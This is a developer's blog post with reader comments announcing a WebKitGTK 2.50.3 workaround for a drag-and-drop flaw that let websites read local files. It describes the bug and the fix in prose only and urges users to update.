WebKitGTK 2.50.3 contains a workaround for CVE-2025-13947, an issue that allows websites to exfiltrate files from your filesystem. If you’re using Epiphany or any other web browser based on WebKitGTK, then you should immediately update to 2.50.3.
Websites may attach file URLs to drag sources. When the drag source is dropped onto a drop target, the website can read the file data for its chosen files, without any restrictions. Oops. Suffice to say, this is not how drag and drop is supposed to work. Websites should not be able to choose for themselves which files to read from your filesystem; only the user is supposed to be able to make that choice, by dragging the file from an external application. That is, drag sources created by websites should not receive file access.
I failed to find the correct way to fix this bug in the two afternoons I allowed myself to work on this issue, so instead my overly-broad solution was to disable file access for all drags. With this workaround, the website will only receive the list of file URLs rather than the file contents.
Apple platforms are not affected by this issue.
Comments
4 responses to “Significant Drag and Drop Vulnerability in WebKitGTK”
Hi, does this only affect drag-n-drop? I usually use select dialogs.
Geary is affected too I assume, does the Flatpak get the fix too? Manjaro I can check later myself, but probably yes..
Haha, the update just arrived in Debian Trixie (LMDE7). I realized I mostly don’t use Geary as flatpak because it has theming issues (e.g. no dark mode).
This only affects drag and drop. The GNOME 48 and 49 Flatpak runtimes are already fixed. I doubt it’s a problem for Geary at all, because emails cannot execute JavaScript.
Thanks. Disabling it is perfectly fine.
I never got into drag/drop and always use some dialog, just to avoid missclicks. It was just more important, than it should.